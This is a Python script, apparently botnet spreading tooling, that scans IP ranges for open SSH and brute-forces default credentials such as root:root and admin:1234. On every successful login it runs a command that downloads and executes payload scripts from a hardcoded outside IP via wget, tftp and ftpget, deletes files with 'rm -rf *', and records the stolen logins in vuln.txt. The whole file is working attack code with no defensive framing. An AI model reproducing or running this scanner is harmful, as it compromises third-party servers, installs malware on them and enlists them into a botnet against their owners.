scanner.py

1. # Voids hacka scanna
2. # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
3. # ulimit -n 99999
4. # python scan.py 1000 <start-range> <end-range>
5.  
6. import threading, paramiko, random, socket, time, sys
7.  
8. paramiko.util.log_to_file("/dev/null")
9.  
10. server_ip = "185.58.193.68"
11.  
12. blacklisted = ["127.0","10.0","192.168"]
13.  
14. passwords = ["admin:1234"]
15.  
16. if sys.argv[4] == "1":
17.     passwords = ["root:root"]
18. if sys.argv[4] == "guest":
19.     passwords = ["guest:guest"]
20. if sys.argv[4] == "telnet":
21.     passwords = ["telnet:telnet"]
22.  
23. if len(sys.argv) < 4:
24.     sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
25.  
26. print "\x1b[0;32m _   ___ _   _         _   _                 \x1b[0;36m"
27. print "\x1b[0;36m| | / (_) | | |       | | | |                \x1b[0;32m"
28. print "\x1b[0;36m| |/ / _| |_| |_ _   _| |_| | __ ___  __ ____\x1b[0;32m"
29. print "\x1b[0;32m|    \| | __| __| | | |  _  |/ _` \ \/ /|_  /\x1b[0;36m"
30. print "\x1b[0;32m| |\ \ | |_| |_| |_| | | | | (_| |>  <  / / \x1b[0;36m"
31. print "\x1b[0;36m\_| \_/_|\__|\__|\__, \_| |_/\__,_/_/\_\/___|\x1b[0;36m"
32. print "\x1b[0;36m                  __/ |                      \x1b[0;36m"
33. print "\x1b[0;36m                 |___/                       \x1b[0;31m"
34. print "\x1b[0;31m\x1b[0;31m"
35. print "\x1b[0;31m\x1b[0;31m"
36.  
37. def sshscanner(ip):
38.     global passwords
39.     try:
40.         thisipisbad='no'
41.         for badip in blacklisted:
42.             if badip in ip:
43.                 thisipisbad='yes'
44.         if thisipisbad=='yes':
45.             sys.exit()
46.         username='root'
47.         password="0"
48.         port = 22
49.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
50.         s.settimeout(3)
51.         s.connect((ip, port))
52.         data = str(s.recv(1024))
53.         if "SSH" in data:
54.             print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
55.         elif "ssh" in data:
56.             print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
57.         else:
58.             sys.exit()
59.         s.close()
60.         ssh = paramiko.SSHClient()
61.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
62.         dobreak=False
63.         for passwd in passwords:
64.             if ":n/a" in passwd:
65.                 password=""
66.             else:
67.                 password=passwd.split(":")[1]
68.             if "n/a:" in passwd:
69.                 username=""
70.             else:
71.                 username=passwd.split(":")[0]
72.             try:
73.                 ssh.connect(ip, port = port, username=username, password=password, timeout=3)
74.                 break
75.             except:
76.                 pass
77.         badserver=True
78.         stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
79.         output = stdout.read()
80.         if "inet addr" in output:
81.             badserver=False
82.         websites = [ ]         
83.         if badserver == False:
84.                 print("\x1b[0;32m[+] crystal im a haxor hehe " + ip + ":" + username + ":" + password + "\x1b[37m")
85.                 ssh.exec_command('cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.166.185.139/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 46.166.185.139 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.166.185.139; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.139 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * ')
86.                 vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
87.                 time.sleep(12)
88.                 ssh.close()
89.     except Exception as e:
90.         pass
91.  
92.  
93. if sys.argv[2] == "LUCKY":
94.     ranges = ["199.92.0.0/199.92.255.255", "182.43.0.0/182.43.255.255", "190.96.0.0/190.97.255.255", "190.232.0.0/190.239.255.255", "190.184.0.0/190.184.255.255", "181.174.0.0/181.174.255.255", "186.183.0.0/186.183.255.255", "59.177.0.0/59.178.255.255", "59.180.0.0/59.180.255.255", "59.182.0.0/59.184.255.255", "181.64.0.0/181.67.255.255", "200.106.0.0/200.106.255.255", "200.121.0.0/200.121.255.255", "201.230.0.0/201.230.255.255", "201.240.0.0/201.240.255.255"]
95.     randomrange = random.choice(ranges)
96.     startrng = randomrange.split("/")[0]
97.     endrng = randomrange.split("/")[1]
98.  
99. if sys.argv[2] != "LUCKY":
100.     a = int(sys.argv[2].split(".")[0])
101.     b = int(sys.argv[2].split(".")[1])
102.     c = int(sys.argv[2].split(".")[2])
103.     d = int(sys.argv[2].split(".")[3])
104. else:
105.     a = int(startrng.split(".")[0])
106.     b = int(startrng.split(".")[1])
107.     c = int(startrng.split(".")[2])
108.     d = int(startrng.split(".")[3])
109. x = 0
110.  
111. while(True):
112.     try:
113.  
114.         if sys.argv[2] != "LUCKY":
115.             endaddr = sys.argv[3]
116.         else:
117.             endaddr = endrng
118.        
119.         d += 1
120.  
121.         ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
122.  
123.         if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
124.             if sys.argv[2] == "LUCKY":
125.                 randomrange = random.choice(ranges)
126.                 startrng = randomrange.split("/")[0]
127.                 endrng = randomrange.split("/")[1]
128.                 a = int(startrng.split(".")[0])
129.                 b = int(startrng.split(".")[1])
130.                 c = int(startrng.split(".")[2])
131.                 d = int(startrng.split(".")[3])
132.             else:
133.                 break
134.  
135.         if d > 255:
136.             c += 1
137.             d = 0
138.  
139.         if c > 255:
140.             b += 1
141.             c = 0
142.        
143.         if b > 255:
144.             a += 1
145.             b = 0
146.  
147.         ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
148.  
149.         if ipaddr == endaddr:
150.             if sys.argv[2] == "LUCKY":
151.                 randomrange = random.choice(ranges)
152.                 startrng = randomrange.split("/")[0]
153.                 endrng = randomrange.split("/")[1]
154.                 a = int(startrng.split(".")[0])
155.                 b = int(startrng.split(".")[1])
156.                 c = int(startrng.split(".")[2])
157.                 d = int(startrng.split(".")[3])
158.             else:
159.                 break
160.  
161.         if x > 500:
162.             time.sleep(1)
163.             x = 0
164.        
165.         t = threading.Thread(target=sshscanner, args=(ipaddr,))
166.         t.start()
167.        
168.     except Exception as e:
169.         pass
170.  
171. print "\x1b[37mDone\x1b[37m"